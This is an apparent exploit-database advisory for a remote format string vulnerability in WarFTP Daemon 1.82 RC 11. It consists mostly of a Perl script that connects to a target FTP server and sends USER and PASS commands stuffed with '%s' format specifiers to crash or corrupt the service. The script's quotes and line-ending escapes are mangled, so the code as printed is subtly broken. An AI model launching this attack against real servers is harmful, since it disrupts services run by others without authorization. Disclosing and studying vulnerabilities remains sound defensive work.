WarFTP Daemon RC 11 Remote Format String Exploit

Summary

WarFTP Daemon 1.82 RC 11 suffers from remote format string vulnerability

Credit:

The information has been provided by coolkaveh.


Details

Vulnerable Systems:
 * WarFTP Daemon 1.82 RC 11

use IO::Socket;
$|=1;
$host=shift || die ‘$0 $host $portn’;
$port=shift || die ‘$0 $host $portn’;
my $username = ‘%s%s%s%s%s%s%s%s%s%s%s%s’;
my $password = ‘%s%s%s%s%s%s%s%s%s%s%s%s’;
print ‘Launch Attack … ‘;
$sock1=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>’tcp’, Timeout=>30) || die ‘HOST $host PORT $port is down!n’;
if(defined($sock1)){
$sock1->recv($content, 100, 0);
sleep(2);
$sock1->send(‘USER ‘.$username.’rn’, 0);
$sock1->send(‘PASS ‘.$password.’rn’, 0);
sleep(2);
$sock1->recv($content, 100, 0);
sleep(5);
$sock1->close;
}
print ‘Finish!n’;
exit(1);

Disclosure Timeline:
Published: 2012-08-31

Categories: Exploits